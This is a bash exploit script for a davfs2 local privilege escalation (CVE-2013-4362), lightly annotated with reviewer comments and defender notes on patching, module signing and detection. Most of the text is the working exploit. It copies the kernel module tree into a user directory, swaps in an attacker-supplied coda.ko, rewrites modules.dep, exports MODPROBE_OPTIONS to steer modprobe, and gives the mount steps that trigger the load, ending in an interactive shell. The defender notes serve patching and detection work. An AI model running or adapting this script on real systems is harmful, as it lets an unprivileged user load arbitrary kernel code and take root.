exploit.sh
#!/bin/bash
# Exploit Title: davfs2 1.4.6/1.4.7 local privilege escalation exploit
# Date: 05/10/2013
# Exploit Author: Lorenzo Cantoni
# Vendor Homepage: http://savannah.nongnu.org/projects/davfs2
# Version: 1.4.6 (tested), 1.4.7 (untested)
# Tested on: Xubuntu 12.04 x86_64
# CVE: 2013-4362
# Info: Vulnerability reported by Werner Baumann: http://www.securityfocus.com/bid/62445
# Overview (reviewer annotation): this script stages a private copy of the
# running kernel's module tree under $PWD, swaps in a caller-supplied coda.ko,
# repoints modules.dep at it, and exports MODPROBE_OPTIONS so that any modprobe
# started from the resulting shell resolves modules from $PWD instead of
# /lib/modules. The privileged step is not performed here; the script only
# prints instructions to run `mount` on a davfs entry from /etc/fstab.
# NOTE(review): the CVE named in the header is described publicly as unsafe use
# of system() in davfs2's mount helper; that the helper passes the caller's
# environment through to modprobe is implied by this script, not shown in it.
#
# Defender notes:
#  - Fix: install a davfs2 build that carries the vendor/distribution patch for
#    the CVE in the header. Until then, drop the setuid bit from the davfs2
#    mount helper or remove `user`/`users` davfs entries from /etc/fstab.
#  - Hardening: enforced module signing, or kernel.modules_disabled=1 once boot
#    is complete, stops an unsigned or late module load regardless of how
#    modprobe was steered.
#  - Detection: modprobe executed with `-d` pointing outside the system module
#    root, MODPROBE_OPTIONS present in the environment of a mount invocation,
#    a lib/modules/<release>/ tree inside a user-writable directory, or the
#    coda module appearing on a host that does not use Coda.

# Release string of the running kernel; used to address the module tree.
KERNELV=`uname -r`
echo "#######################################"
echo "Specify the full path of the kernel module which you want to load"
echo "Leave empty if you wish to compile it now"
echo "Understand that you need kernel headers, make and gcc for successful compilation"
echo "#######################################"
# Path is taken from stdin. NOTE(review): `read` without -r interprets
# backslashes, and the unquoted test below breaks on paths containing spaces.
read EXPLOITMODPATH
if [ -z $EXPLOITMODPATH ]; then
# Empty answer: build in the current directory. The Makefile is not part of
# this file; it is presumably expected to produce ./coda.ko.
make
EXPLOITMODPATH=$PWD/coda.ko
fi
echo "#######################################"
echo "Copying the modules in use for the running kernel in the local directory"
echo "#######################################"
# Mirror /lib/modules/<release> into ./lib/modules so the copy can be edited
# without write access to the system tree.
mkdir -p lib/modules
cp -R /lib/modules/`uname -r` lib/modules
echo "#######################################"
echo "Copying coda.ko module"
echo "#######################################"
# Place the supplied module in the mirrored tree's kernel/fs/coda directory.
# It replaces the stock coda.ko only if the supplied file has that name.
cp $EXPLOITMODPATH $PWD/lib/modules/$KERNELV/kernel/fs/coda
echo "#######################################"
echo "Setting the 'modules.dep' and running depmod"
echo "#######################################"
# Escape every "/" in $PWD so the path can sit inside a sed s/// expression.
# NOTE(review): the three /tmp files used below have fixed, predictable names
# in a world-writable directory; mktemp would avoid clobbering or symlink
# surprises on a shared host.
echo -n $PWD | sed 's/\//\\\//g' > /tmp/escapedpwd
ESCAPEDPWD=`cat /tmp/escapedpwd`
OLD_CODA_PATH="kernel\/fs\/coda\/coda.ko"
NEW_CODA_PATH="$ESCAPEDPWD\/lib\/modules\/$KERNELV\/kernel\/fs\/coda\/coda.ko"
# Rewrite the relative coda.ko entry in the mirrored modules.dep to the
# absolute path inside $PWD.
sed 's/'$OLD_CODA_PATH'/'$NEW_CODA_PATH'/g' $PWD/lib/modules/$KERNELV/modules.dep > /tmp/new_modules.dep
# Remove every backslash from the rewritten file, then install the result as
# the mirrored tree's modules.dep.
cat /tmp/new_modules.dep | sed 's/\\//g' > /tmp/modules.dep.ok
cp /tmp/modules.dep.ok $PWD/lib/modules/$KERNELV/modules.dep
# Regenerate the dependency data with $PWD as the base directory.
depmod -b $PWD
echo "#######################################"
echo "Setting MODPROBE_OPTIONS variable"
echo "#######################################"
# modprobe prepends MODPROBE_OPTIONS to its command line; "-d DIR" makes it
# treat DIR as the root of the module tree. This is the environment value a
# privileged caller must not inherit from an unprivileged user.
export MODPROBE_OPTIONS="-d $PWD"
echo "#######################################"
# The remaining echo lines only print manual steps (edit the per-user
# davfs.conf, pick a user-mountable davfs entry, run mount); nothing below
# edits configuration or mounts anything.
echo "Now, check the the $HOME/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:"
echo "# General Options"
echo "# ---------------"
echo ""
echo "# dav_user davfs2 # system wide config file only"
echo "# dav_group davfs2 # system wide config file only"
echo "# ignore_home # system wide config file only"
echo "kernel_fs coda"
echo "# buf_size 16 # KiByte"
echo "#######################################"
echo "#######################################"
echo "Then, check /etc/fstab for remote webdav servers which the user can mount, eg:"
echo "https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0"
echo "#######################################"
echo "#######################################"
echo "If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'"
echo "#######################################"
# Clean up the intermediate files created under /tmp.
rm /tmp/escapedpwd
rm /tmp/new_modules.dep
rm /tmp/modules.dep.ok
# Replace this process with an interactive shell so the exported
# MODPROBE_OPTIONS stays in the environment of whatever is run next.
exec /bin/bash -i